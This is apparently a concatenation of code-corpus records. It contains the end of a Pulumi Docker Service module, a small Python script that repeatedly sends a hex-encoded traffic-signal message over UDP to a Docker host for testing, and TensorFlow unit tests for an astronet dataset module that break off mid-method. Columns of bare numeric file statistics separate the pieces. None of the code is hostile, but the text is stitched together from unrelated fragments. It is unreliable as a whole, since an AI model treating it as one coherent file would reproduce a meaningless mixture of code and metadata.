* `mode` (`pulumi.Input[str]`) - The mode of resolution to use for internal load balancing between tasks. `(vip|dnsrr)`. Default: `vip`.
* `ports` (`pulumi.Input[list]`) - See Ports below for details.
* `name` (`pulumi.Input[str]`) - A random name for the port.
* `protocol` (`pulumi.Input[str]`) - Protocol that can be used over this port: `tcp|udp|sctp`. Default: `tcp`.
* `publishMode` (`pulumi.Input[str]`) - Represents the mode in which the port is to be published: `ingress|host`
* `publishedPort` (`pulumi.Input[float]`) - The port on the swarm hosts. If not set the value of `target_port` will be used.
* `targetPort` (`pulumi.Input[float]`) - Port inside the container.
The **mode** object supports the following:
* `global` (`pulumi.Input[bool]`)
* `replicated` (`pulumi.Input[dict]`)
* `replicas` (`pulumi.Input[float]`)
The **rollback_config** object supports the following:
* `delay` (`pulumi.Input[str]`)
* `failureAction` (`pulumi.Input[str]`)
* `maxFailureRatio` (`pulumi.Input[str]`)
* `monitor` (`pulumi.Input[str]`)
* `order` (`pulumi.Input[str]`)
* `parallelism` (`pulumi.Input[float]`)
The **task_spec** object supports the following:
* `containerSpec` (`pulumi.Input[dict]`)
* `args` (`pulumi.Input[list]`)
* `commands` (`pulumi.Input[list]`)
* `configs` (`pulumi.Input[list]`)
* `configId` (`pulumi.Input[str]`) - ConfigID represents the ID of the specific config.
* `configName` (`pulumi.Input[str]`) - The name of the config that this references, but internally it is just provided for lookup/display purposes
* `fileName` (`pulumi.Input[str]`) - Represents the final filename in the filesystem. The specific target file that the config data is written within the docker container, e.g. `/root/config/config.json`
* `dir` (`pulumi.Input[str]`)
* `dnsConfig` (`pulumi.Input[dict]`)
* `nameservers` (`pulumi.Input[list]`)
* `options` (`pulumi.Input[list]`) - The options for the logging driver, e.g.
* `searches` (`pulumi.Input[list]`)
* `env` (`pulumi.Input[dict]`)
* `groups` (`pulumi.Input[list]`)
* `healthcheck` (`pulumi.Input[dict]`)
* `interval` (`pulumi.Input[str]`)
* `retries` (`pulumi.Input[float]`)
* `startPeriod` (`pulumi.Input[str]`)
* `tests` (`pulumi.Input[list]`)
* `timeout` (`pulumi.Input[str]`)
* `hostname` (`pulumi.Input[str]`)
* `hosts` (`pulumi.Input[list]`)
* `host` (`pulumi.Input[str]`)
* `ip` (`pulumi.Input[str]`)
* `image` (`pulumi.Input[str]`)
* `isolation` (`pulumi.Input[str]`)
* `labels` (`pulumi.Input[dict]`)
* `mounts` (`pulumi.Input[list]`)
* `bindOptions` (`pulumi.Input[dict]`)
* `propagation` (`pulumi.Input[str]`)
* `read_only` (`pulumi.Input[bool]`)
* `source` (`pulumi.Input[str]`)
* `target` (`pulumi.Input[str]`)
* `tmpfsOptions` (`pulumi.Input[dict]`)
* `mode` (`pulumi.Input[float]`) - The mode of resolution to use for internal load balancing between tasks. `(vip|dnsrr)`. Default: `vip`.
* `sizeBytes` (`pulumi.Input[float]`)
* `type` (`pulumi.Input[str]`)
* `volumeOptions` (`pulumi.Input[dict]`)
* `driverName` (`pulumi.Input[str]`)
* `driverOptions` (`pulumi.Input[dict]`)
* `labels` (`pulumi.Input[dict]`)
* `noCopy` (`pulumi.Input[bool]`)
* `privileges` (`pulumi.Input[dict]`)
* `credentialSpec` (`pulumi.Input[dict]`)
* `file` (`pulumi.Input[str]`)
* `registry` (`pulumi.Input[str]`)
* `seLinuxContext` (`pulumi.Input[dict]`)
* `disable` (`pulumi.Input[bool]`)
* `level` (`pulumi.Input[str]`)
* `role` (`pulumi.Input[str]`)
* `type` (`pulumi.Input[str]`)
* `user` (`pulumi.Input[str]`)
* `read_only` (`pulumi.Input[bool]`)
* `secrets` (`pulumi.Input[list]`)
* `fileName` (`pulumi.Input[str]`) - Represents the final filename in the filesystem. The specific target file that the config data is written within the docker container, e.g. `/root/config/config.json`
* `secretId` (`pulumi.Input[str]`)
* `secretName` (`pulumi.Input[str]`)
* `stopGracePeriod` (`pulumi.Input[str]`)
* `stopSignal` (`pulumi.Input[str]`)
* `user` (`pulumi.Input[str]`)
* `forceUpdate` (`pulumi.Input[float]`)
* `log_driver` (`pulumi.Input[dict]`)
* `name` (`pulumi.Input[str]`) - A random name for the port.
* `options` (`pulumi.Input[dict]`) - The options for the logging driver, e.g.
* `networks` (`pulumi.Input[list]`)
* `placement` (`pulumi.Input[dict]`)
* `constraints` (`pulumi.Input[list]`)
* `platforms` (`pulumi.Input[list]`)
* `architecture` (`pulumi.Input[str]`)
* `os` (`pulumi.Input[str]`)
* `prefs` (`pulumi.Input[list]`)
* `resources` (`pulumi.Input[dict]`)
* `limits` (`pulumi.Input[dict]`)
* `genericResources` (`pulumi.Input[dict]`)
* `discreteResourcesSpecs` (`pulumi.Input[list]`)
* `namedResourcesSpecs` (`pulumi.Input[list]`)
* `memoryBytes` (`pulumi.Input[float]`)
* `nanoCpus` (`pulumi.Input[float]`)
* `reservation` (`pulumi.Input[dict]`)
* `genericResources` (`pulumi.Input[dict]`)
* `discreteResourcesSpecs` (`pulumi.Input[list]`)
* `namedResourcesSpecs` (`pulumi.Input[list]`)
* `memoryBytes` (`pulumi.Input[float]`)
* `nanoCpus` (`pulumi.Input[float]`)
* `restartPolicy` (`pulumi.Input[dict]`)
* `condition` (`pulumi.Input[str]`)
* `delay` (`pulumi.Input[str]`)
* `maxAttempts` (`pulumi.Input[float]`)
* `window` (`pulumi.Input[str]`)
* `runtime` (`pulumi.Input[str]`)
The **update_config** object supports the following:
* `delay` (`pulumi.Input[str]`)
* `failureAction` (`pulumi.Input[str]`)
* `maxFailureRatio` (`pulumi.Input[str]`)
* `monitor` (`pulumi.Input[str]`)
* `order` (`pulumi.Input[str]`)
* `parallelism` (`pulumi.Input[float]`)
> This content is derived from https://github.com/terraform-providers/terraform-provider-docker/blob/master/website/docs/r/service.html.markdown.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["auth"] = auth
__props__["converge_config"] = converge_config
__props__["endpoint_spec"] = endpoint_spec
__props__["labels"] = labels
__props__["mode"] = mode
__props__["name"] = name
__props__["rollback_config"] = rollback_config
__props__["task_spec"] = task_spec
__props__["update_config"] = update_config
return Service(resource_name, opts=opts, __props__=__props__)
def translate_output_property(self, prop):
return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 41.834586
| 245
| 0.539073
| 2,779
| 27,820
| 5.303706
| 0.105074
| 0.18658
| 0.106384
| 0.018997
| 0.844359
| 0.820408
| 0.815252
| 0.811792
| 0.799647
| 0.799647
| 0
| 0.000052
| 0.313336
| 27,820
| 664
| 246
| 41.89759
| 0.771502
| 0.559022
| 0
| 0.029851
| 1
| 0
| 0.144954
| 0.008386
| 0
| 0
| 0
| 0
| 0
| 1
| 0.059701
| false
| 0.014925
| 0.089552
| 0.029851
| 0.343284
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
867bc781598ec6bd6d3ca0995c2d287290060113
| 2,364
|
py
|
Python
|
scripts/tests/udpsender_map.py
|
dmccoystephenson/jpo-ode
|
55ece72360c60e68d4d82f4561ab6fd1669c9469
|
[
"Apache-2.0"
] | 75
|
2016-11-24T12:59:43.000Z
|
2021-11-30T09:09:57.000Z
|
scripts/tests/udpsender_map.py
|
dmccoystephenson/jpo-ode
|
55ece72360c60e68d4d82f4561ab6fd1669c9469
|
[
"Apache-2.0"
] | 179
|
2016-11-22T21:18:45.000Z
|
2022-03-16T20:02:13.000Z
|
scripts/tests/udpsender_map.py
|
dmccoystephenson/jpo-ode
|
55ece72360c60e68d4d82f4561ab6fd1669c9469
|
[
"Apache-2.0"
] | 43
|
2016-11-28T11:37:07.000Z
|
2022-01-17T05:14:30.000Z
|
import socket
import time
import os
# Currently set to oim-dev environment's ODE
UDP_IP = os.getenv('DOCKER_HOST_IP')
UDP_PORT = 44920
MESSAGE = "001283c138003000205e9c014d3eab092ca624b5518202dc3658042800000400023622c60ca009f66d48abfaf81388d8ad18070027d9b2ffcfe9804f13667b1ffd009ec2c76e3ffc82c4e0001004b00c5000000800066c4574101813ecd8b757fae027d9b30e6ff5604ec363561fe7809ec6cd69bfec813c4d8a617fc9027d9b2147008604fb163666000016250000802580228000001000096229e1309b51a6fe4204dd361cf1fe5009f6018e1000096020a00000080004d88a57f84027d9b3827002804ec36087600a009f62c289407282c310001c0440188800000006c46dbe02813ec5816d800710052200000001b11b6fad404fb16054a0000401c8800000006c47b3d24813ec5816d801b100c4200000000af890f12c580007e87100d4200000008af4c0f12c580077e7a2c0004000160002001cb028d000000800052c160bc40b5fffd8a9409d86bfebb5b40141457fef53b76c008b467014145800080002bffcbffc82c6a0001804b024d000000800036c2213c3b013ecd80096d64027d9affd8cdfc04f635ff7983bc09f66c0082aa2014280b1b80006012c0b3400000100004b02bcf0f6d7fe065d602788b0138eb900b1240001012c083400000080009b0c2af0b804fb15fe6de171afff6c63e04ec15fe1de670060e40002581ea8000004000135da6df0180a0a6adc2c00d0143cd51897fda028c8abb25001a0b0680008012c105400000200009aedbefae005053540ee003c0a326a9cf3fed8143c5667780010582c0004009608aa00000080004d76de7ee402829aba88ffdc050f354525fff80a322bcf23fa602c690000c04b0395000000200016bb4fbd4e01414d3215800802940ab108fff2030d2000110126200000001aee5103be050a15f6f1ffc8404d8800000006bb97c18e0142857dfa800010146200000001aee89099a050a15f8720000b05dd000000800046be3743b781428d80e1b00002879b00514b4404f63600827d8c09e22c000400015ffe6007016190000402582ce8000004000135ecee1de80a146c02e54758143cd8059ad3e027b1b00613dd004f102c360000804b055d000000200046bcc7c3c781428d80108c6e02829b002b2ece050a16019a4b29b00ab5c3604f136004e410409ec018a10000960c3a00000080004d7de9878602851b003923cc05053601623b440a0a6bfb8c3a5014140b0640005012c197400000100005afe570ef2050a36003a47c80a0a6bfd2c45f014140b054000501101a8200000001b05a90edc050535ffe605800a0a101b8200000001b08a30ec0050535ffe605300a0a101c8200000005b0c6f0ea4050515ffca0568b0001000e"
print("UDP target IP:", UDP_IP)
print("UDP target port:", UDP_PORT)
#print("message:", MESSAGE)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
while True:
time.sleep(5)
print("sending SRM every 5 second")
sock.sendto(bytes.fromhex(MESSAGE), (UDP_IP, UDP_PORT))
| 118.2
| 1,942
| 0.950508
| 71
| 2,364
| 31.507042
| 0.535211
| 0.006705
| 0.008046
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.625597
| 0.024958
| 2,364
| 19
| 1,943
| 124.421053
| 0.344902
| 0.030457
| 0
| 0
| 0
| 0
| 0.874126
| 0.843531
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.230769
| 0
| 0.230769
| 0.230769
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8682f25cbad8884b6ac4fe428eda85f808bd1a3f
| 26,419
|
py
|
Python
|
research/astronet/astronet/ops/dataset_ops_test.py
|
jdavidagudelo/tensorflow-models
|
6f019beec73b01861363bf717706e27f4210b979
|
[
"Apache-2.0"
] | 1
|
2021-05-17T01:42:29.000Z
|
2021-05-17T01:42:29.000Z
|
research/astronet/astronet/ops/dataset_ops_test.py
|
jdavidagudelo/tensorflow-models
|
6f019beec73b01861363bf717706e27f4210b979
|
[
"Apache-2.0"
] | null | null | null |
research/astronet/astronet/ops/dataset_ops_test.py
|
jdavidagudelo/tensorflow-models
|
6f019beec73b01861363bf717706e27f4210b979
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 The TensorFlow Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for dataset_ops.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import flags
import numpy as np
import tensorflow as tf
from research.astronet.astronet.ops import dataset_ops
from research.astronet.astronet.util import configdict
FLAGS = flags.FLAGS
flags.DEFINE_string("test_srcdir", "", "Test source directory.")
_TEST_TFRECORD_FILE = "test_data/test_dataset.tfrecord"
class DatasetOpsTest(tf.test.TestCase):
def testPadTensorToBatchSize(self):
with self.test_session():
# Cannot pad a 0-dimensional Tensor.
tensor_0d = tf.constant(1)
with self.assertRaises(ValueError):
dataset_ops.pad_tensor_to_batch_size(tensor_0d, 10)
# 1-dimensional Tensor. Un-padded batch size is 5.
tensor_1d = tf.range(5, dtype=tf.int32)
self.assertEqual([5], tensor_1d.shape)
self.assertAllEqual([0, 1, 2, 3, 4], tensor_1d.eval())
# Invalid to pad Tensor with batch size 5 to batch size 3.
tensor_1d_pad3 = dataset_ops.pad_tensor_to_batch_size(tensor_1d, 3)
with self.assertRaises(tf.errors.InvalidArgumentError):
tensor_1d_pad3.eval()
tensor_1d_pad5 = dataset_ops.pad_tensor_to_batch_size(tensor_1d, 5)
self.assertEqual([5], tensor_1d_pad5.shape)
self.assertAllEqual([0, 1, 2, 3, 4], tensor_1d_pad5.eval())
tensor_1d_pad8 = dataset_ops.pad_tensor_to_batch_size(tensor_1d, 8)
self.assertEqual([8], tensor_1d_pad8.shape)
self.assertAllEqual([0, 1, 2, 3, 4, 0, 0, 0], tensor_1d_pad8.eval())
# 2-dimensional Tensor. Un-padded batch size is 3.
tensor_2d = tf.reshape(tf.range(9, dtype=tf.int32), [3, 3])
self.assertEqual([3, 3], tensor_2d.shape)
self.assertAllEqual([[0, 1, 2], [3, 4, 5], [6, 7, 8]], tensor_2d.eval())
tensor_2d_pad2 = dataset_ops.pad_tensor_to_batch_size(tensor_2d, 2)
# Invalid to pad Tensor with batch size 2 to batch size 2.
with self.assertRaises(tf.errors.InvalidArgumentError):
tensor_2d_pad2.eval()
tensor_2d_pad3 = dataset_ops.pad_tensor_to_batch_size(tensor_2d, 3)
self.assertEqual([3, 3], tensor_2d_pad3.shape)
self.assertAllEqual([[0, 1, 2], [3, 4, 5], [6, 7, 8]],
tensor_2d_pad3.eval())
tensor_2d_pad4 = dataset_ops.pad_tensor_to_batch_size(tensor_2d, 4)
self.assertEqual([4, 3], tensor_2d_pad4.shape)
self.assertAllEqual([[0, 1, 2], [3, 4, 5], [6, 7, 8], [0, 0, 0]],
tensor_2d_pad4.eval())
def testPadDatasetToBatchSizeNoWeights(self):
values = {"labels": np.arange(10, dtype=np.int32)}
dataset = tf.data.Dataset.from_tensor_slices(values).batch(4)
self.assertItemsEqual(["labels"], dataset.output_shapes.keys())
self.assertFalse(dataset.output_shapes["labels"].is_fully_defined())
dataset_pad = dataset_ops.pad_dataset_to_batch_size(dataset, 4)
self.assertItemsEqual(["labels", "weights"],
dataset_pad.output_shapes.keys())
self.assertEqual([4], dataset_pad.output_shapes["labels"])
self.assertEqual([4], dataset_pad.output_shapes["weights"])
next_batch = dataset_pad.make_one_shot_iterator().get_next()
next_labels = next_batch["labels"]
next_weights = next_batch["weights"]
with self.test_session() as sess:
labels, weights = sess.run([next_labels, next_weights])
self.assertAllEqual([0, 1, 2, 3], labels)
self.assertAllClose([1, 1, 1, 1], weights)
labels, weights = sess.run([next_labels, next_weights])
self.assertAllEqual([4, 5, 6, 7], labels)
self.assertAllClose([1, 1, 1, 1], weights)
labels, weights = sess.run([next_labels, next_weights])
self.assertAllEqual([8, 9, 0, 0], labels)
self.assertAllClose([1, 1, 0, 0], weights)
with self.assertRaises(tf.errors.OutOfRangeError):
sess.run([next_labels, next_weights])
def testPadDatasetToBatchSizeWithWeights(self):
values = {
"labels": np.arange(10, dtype=np.int32),
"weights": 100 + np.arange(10, dtype=np.int32)
}
dataset = tf.data.Dataset.from_tensor_slices(values).batch(4)
self.assertItemsEqual(["labels", "weights"], dataset.output_shapes.keys())
self.assertFalse(dataset.output_shapes["labels"].is_fully_defined())
self.assertFalse(dataset.output_shapes["weights"].is_fully_defined())
dataset_pad = dataset_ops.pad_dataset_to_batch_size(dataset, 4)
self.assertItemsEqual(["labels", "weights"],
dataset_pad.output_shapes.keys())
self.assertEqual([4], dataset_pad.output_shapes["labels"])
self.assertEqual([4], dataset_pad.output_shapes["weights"])
next_batch = dataset_pad.make_one_shot_iterator().get_next()
next_labels = next_batch["labels"]
next_weights = next_batch["weights"]
with self.test_session() as sess:
labels, weights = sess.run([next_labels, next_weights])
self.assertAllEqual([0, 1, 2, 3], labels)
self.assertAllEqual([100, 101, 102, 103], weights)
labels, weights = sess.run([next_labels, next_weights])
self.assertAllEqual([4, 5, 6, 7], labels)
self.assertAllEqual([104, 105, 106, 107], weights)
labels, weights = sess.run([next_labels, next_weights])
self.assertAllEqual([8, 9, 0, 0], labels)
self.assertAllEqual([108, 109, 0, 0], weights)
with self.assertRaises(tf.errors.OutOfRangeError):
sess.run([next_labels, next_weights])
def testSetBatchSizeSingleTensor1d(self):
dataset = tf.data.Dataset.range(4).batch(2)
self.assertFalse(dataset.output_shapes.is_fully_defined())
dataset = dataset_ops.set_batch_size(dataset, 2)
self.assertEqual([2], dataset.output_shapes)
next_batch = dataset.make_one_shot_iterator().get_next()
with self.test_session() as sess:
batch_value = sess.run(next_batch)
self.assertAllEqual([0, 1], batch_value)
batch_value = sess.run(next_batch)
self.assertAllEqual([2, 3], batch_value)
with self.assertRaises(tf.errors.OutOfRangeError):
sess.run(next_batch)
def testSetBatchSizeSingleTensor2d(self):
values = np.arange(12, dtype=np.int32).reshape([4, 3])
dataset = tf.data.Dataset.from_tensor_slices(values).batch(2)
self.assertFalse(dataset.output_shapes.is_fully_defined())
dataset = dataset_ops.set_batch_size(dataset, 2)
self.assertEqual([2, 3], dataset.output_shapes)
next_batch = dataset.make_one_shot_iterator().get_next()
with self.test_session() as sess:
batch_value = sess.run(next_batch)
self.assertAllEqual([[0, 1, 2], [3, 4, 5]], batch_value)
batch_value = sess.run(next_batch)
self.assertAllEqual([[6, 7, 8], [9, 10, 11]], batch_value)
with self.assertRaises(tf.errors.OutOfRangeError):
sess.run(next_batch)
def testSetBatchSizeNested(self):
values = {
"a": 100 + np.arange(4, dtype=np.int32),
"nest": {
"b": np.arange(12, dtype=np.int32).reshape([4, 3]),
"c": np.arange(4, dtype=np.int32)
}
}
dataset = tf.data.Dataset.from_tensor_slices(values).batch(2)
self.assertItemsEqual(["a", "nest"], dataset.output_shapes.keys())
self.assertItemsEqual(["b", "c"], dataset.output_shapes["nest"].keys())
self.assertFalse(dataset.output_shapes["a"].is_fully_defined())
self.assertFalse(dataset.output_shapes["nest"]["b"].is_fully_defined())
self.assertFalse(dataset.output_shapes["nest"]["c"].is_fully_defined())
dataset = dataset_ops.set_batch_size(dataset, 2)
self.assertItemsEqual(["a", "nest"], dataset.output_shapes.keys())
self.assertItemsEqual(["b", "c"], dataset.output_shapes["nest"].keys())
self.assertEqual([2], dataset.output_shapes["a"])
self.assertEqual([2, 3], dataset.output_shapes["nest"]["b"])
self.assertEqual([2], dataset.output_shapes["nest"]["c"])
next_batch = dataset.make_one_shot_iterator().get_next()
next_a = next_batch["a"]
next_b = next_batch["nest"]["b"]
next_c = next_batch["nest"]["c"]
with self.test_session() as sess:
a, b, c = sess.run([next_a, next_b, next_c])
self.assertAllEqual([100, 101], a)
self.assertAllEqual([[0, 1, 2], [3, 4, 5]], b)
self.assertAllEqual([0, 1], c)
a, b, c = sess.run([next_a, next_b, next_c])
self.assertAllEqual([102, 103], a)
self.assertAllEqual([[6, 7, 8], [9, 10, 11]], b)
self.assertAllEqual([2, 3], c)
with self.assertRaises(tf.errors.OutOfRangeError):
sess.run(next_batch)
class BuildDatasetTest(tf.test.TestCase):
def setUp(self):
super(BuildDatasetTest, self).setUp()
# The test dataset contains 10 tensorflow.Example protocol buffers. The i-th
# Example contains the following features:
# global_view = [0.0, 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0]
# local_view = [0.0, 1.0, 2.0, 3.0]
# aux_feature = 100 + i
# label_str = "PC" if i % 3 == 0 else "AFP" if i % 3 == 1 else "NTP"
self._file_pattern = _TEST_TFRECORD_FILE
self._input_config = configdict.ConfigDict({
"features": {
"global_view": {
"is_time_series": True,
"length": 8
},
"local_view": {
"is_time_series": True,
"length": 4
},
"aux_feature": {
"is_time_series": False,
"length": 1
}
}
})
def testNonExistentFileRaisesValueError(self):
with self.assertRaises(ValueError):
dataset_ops.build_dataset(
file_pattern="nonexistent",
input_config=self._input_config,
batch_size=4)
def testBuildWithoutLabels(self):
dataset = dataset_ops.build_dataset(
file_pattern=self._file_pattern,
input_config=self._input_config,
batch_size=4,
include_labels=False)
# We can use a one-shot iterator without labels because we don't have the
# stateful hash map for label ids.
iterator = dataset.make_one_shot_iterator()
features = iterator.get_next()
# Expect features only.
self.assertItemsEqual(["time_series_features", "aux_features"],
features.keys())
with self.test_session() as sess:
# Batch 1.
f = sess.run(features)
np.testing.assert_array_almost_equal([
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
], f["time_series_features"]["global_view"])
np.testing.assert_array_almost_equal([
[0, 1, 2, 3],
[0, 1, 2, 3],
[0, 1, 2, 3],
[0, 1, 2, 3],
], f["time_series_features"]["local_view"])
np.testing.assert_array_almost_equal([[100], [101], [102], [103]],
f["aux_features"]["aux_feature"])
# Batch 2.
f = sess.run(features)
np.testing.assert_array_almost_equal([
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
], f["time_series_features"]["global_view"])
np.testing.assert_array_almost_equal([
[0, 1, 2, 3],
[0, 1, 2, 3],
[0, 1, 2, 3],
[0, 1, 2, 3],
], f["time_series_features"]["local_view"])
np.testing.assert_array_almost_equal([[104], [105], [106], [107]],
f["aux_features"]["aux_feature"])
# Batch 3.
f = sess.run(features)
np.testing.assert_array_almost_equal([
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
], f["time_series_features"]["global_view"])
np.testing.assert_array_almost_equal([
[0, 1, 2, 3],
[0, 1, 2, 3],
], f["time_series_features"]["local_view"])
np.testing.assert_array_almost_equal([[108], [109]],
f["aux_features"]["aux_feature"])
# No more batches.
with self.assertRaises(tf.errors.OutOfRangeError):
sess.run(features)
def testLabels1(self):
self._input_config["label_feature"] = "label_str"
self._input_config["label_map"] = {"PC": 0, "AFP": 1, "NTP": 2}
dataset = dataset_ops.build_dataset(
file_pattern=self._file_pattern,
input_config=self._input_config,
batch_size=4)
# We need an initializable iterator when using labels because of the
# stateful label id hash table.
iterator = dataset.make_initializable_iterator()
inputs = iterator.get_next()
init_op = tf.tables_initializer()
# Expect features and labels.
self.assertItemsEqual(["time_series_features", "aux_features", "labels"],
inputs.keys())
labels = inputs["labels"]
with self.test_session() as sess:
sess.run([init_op, iterator.initializer])
# Fetch 3 batches.
np.testing.assert_array_equal([0, 1, 2, 0], sess.run(labels))
np.testing.assert_array_equal([1, 2, 0, 1], sess.run(labels))
np.testing.assert_array_equal([2, 0], sess.run(labels))
# No more batches.
with self.assertRaises(tf.errors.OutOfRangeError):
sess.run(labels)
def testLabels2(self):
self._input_config["label_feature"] = "label_str"
self._input_config["label_map"] = {"PC": 1, "AFP": 0, "NTP": 0}
dataset = dataset_ops.build_dataset(
file_pattern=self._file_pattern,
input_config=self._input_config,
batch_size=4)
# We need an initializable iterator when using labels because of the
# stateful label id hash table.
iterator = dataset.make_initializable_iterator()
inputs = iterator.get_next()
init_op = tf.tables_initializer()
# Expect features and labels.
self.assertItemsEqual(["time_series_features", "aux_features", "labels"],
inputs.keys())
labels = inputs["labels"]
with self.test_session() as sess:
sess.run([init_op, iterator.initializer])
# Fetch 3 batches.
np.testing.assert_array_equal([1, 0, 0, 1], sess.run(labels))
np.testing.assert_array_equal([0, 0, 1, 0], sess.run(labels))
np.testing.assert_array_equal([0, 1], sess.run(labels))
# No more batches.
with self.assertRaises(tf.errors.OutOfRangeError):
sess.run(labels)
def testBadLabelIdsRaisesValueError(self):
self._input_config["label_feature"] = "label_str"
# Label ids should be contiguous integers starting at 0.
self._input_config["label_map"] = {"PC": 1, "AFP": 2, "NTP": 3}
with self.assertRaises(ValueError):
dataset_ops.build_dataset(
file_pattern=self._file_pattern,
input_config=self._input_config,
batch_size=4)
def testUnknownLabel(self):
self._input_config["label_feature"] = "label_str"
# label_map does not include "NTP".
self._input_config["label_map"] = {"PC": 1, "AFP": 0}
dataset = dataset_ops.build_dataset(
file_pattern=self._file_pattern,
input_config=self._input_config,
batch_size=4)
# We need an initializable iterator when using labels because of the
# stateful label id hash table.
iterator = dataset.make_initializable_iterator()
inputs = iterator.get_next()
init_op = tf.tables_initializer()
# Expect features and labels.
self.assertItemsEqual(["time_series_features", "aux_features", "labels"],
inputs.keys())
labels = inputs["labels"]
with self.test_session() as sess:
sess.run([init_op, iterator.initializer])
# Unknown label "NTP".
with self.assertRaises(tf.errors.InvalidArgumentError):
sess.run(labels)
def testReverseTimeSeries(self):
dataset = dataset_ops.build_dataset(
file_pattern=self._file_pattern,
input_config=self._input_config,
batch_size=4,
reverse_time_series_prob=1,
include_labels=False)
# We can use a one-shot iterator without labels because we don't have the
# stateful hash map for label ids.
iterator = dataset.make_one_shot_iterator()
features = iterator.get_next()
# Expect features only.
self.assertItemsEqual(["time_series_features", "aux_features"],
features.keys())
with self.test_session() as sess:
# Batch 1.
f = sess.run(features)
np.testing.assert_array_almost_equal([
[7, 6, 5, 4, 3, 2, 1, 0],
[7, 6, 5, 4, 3, 2, 1, 0],
[7, 6, 5, 4, 3, 2, 1, 0],
[7, 6, 5, 4, 3, 2, 1, 0],
], f["time_series_features"]["global_view"])
np.testing.assert_array_almost_equal([
[3, 2, 1, 0],
[3, 2, 1, 0],
[3, 2, 1, 0],
[3, 2, 1, 0],
], f["time_series_features"]["local_view"])
np.testing.assert_array_almost_equal([[100], [101], [102], [103]],
f["aux_features"]["aux_feature"])
# Batch 2.
f = sess.run(features)
np.testing.assert_array_almost_equal([
[7, 6, 5, 4, 3, 2, 1, 0],
[7, 6, 5, 4, 3, 2, 1, 0],
[7, 6, 5, 4, 3, 2, 1, 0],
[7, 6, 5, 4, 3, 2, 1, 0],
], f["time_series_features"]["global_view"])
np.testing.assert_array_almost_equal([
[3, 2, 1, 0],
[3, 2, 1, 0],
[3, 2, 1, 0],
[3, 2, 1, 0],
], f["time_series_features"]["local_view"])
np.testing.assert_array_almost_equal([[104], [105], [106], [107]],
f["aux_features"]["aux_feature"])
# Batch 3.
f = sess.run(features)
np.testing.assert_array_almost_equal([
[7, 6, 5, 4, 3, 2, 1, 0],
[7, 6, 5, 4, 3, 2, 1, 0],
], f["time_series_features"]["global_view"])
np.testing.assert_array_almost_equal([
[3, 2, 1, 0],
[3, 2, 1, 0],
], f["time_series_features"]["local_view"])
np.testing.assert_array_almost_equal([[108], [109]],
f["aux_features"]["aux_feature"])
# No more batches.
with self.assertRaises(tf.errors.OutOfRangeError):
sess.run(features)
def testRepeat(self):
dataset = dataset_ops.build_dataset(
file_pattern=self._file_pattern,
input_config=self._input_config,
batch_size=4,
include_labels=False)
# We can use a one-shot iterator without labels because we don't have the
# stateful hash map for label ids.
iterator = dataset.make_one_shot_iterator()
features = iterator.get_next()
# Expect features only.
self.assertItemsEqual(["time_series_features", "aux_features"],
features.keys())
with self.test_session() as sess:
# Batch 1.
f = sess.run(features)
np.testing.assert_array_almost_equal([
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
], f["time_series_features"]["global_view"])
np.testing.assert_array_almost_equal([
[0, 1, 2, 3],
[0, 1, 2, 3],
[0, 1, 2, 3],
[0, 1, 2, 3],
], f["time_series_features"]["local_view"])
np.testing.assert_array_almost_equal([[100], [101], [102], [103]],
f["aux_features"]["aux_feature"])
# Batch 2.
f = sess.run(features)
np.testing.assert_array_almost_equal([
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
], f["time_series_features"]["global_view"])
np.testing.assert_array_almost_equal([
[0, 1, 2, 3],
[0, 1, 2, 3],
[0, 1, 2, 3],
[0, 1, 2, 3],
], f["time_series_features"]["local_view"])
np.testing.assert_array_almost_equal([[104], [105], [106], [107]],
f["aux_features"]["aux_feature"])
# Batch 3.
f = sess.run(features)
np.testing.assert_array_almost_equal([
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
], f["time_series_features"]["global_view"])
np.testing.assert_array_almost_equal([
[0, 1, 2, 3],
[0, 1, 2, 3],
], f["time_series_features"]["local_view"])
np.testing.assert_array_almost_equal([[108], [109]],
f["aux_features"]["aux_feature"])
# No more batches.
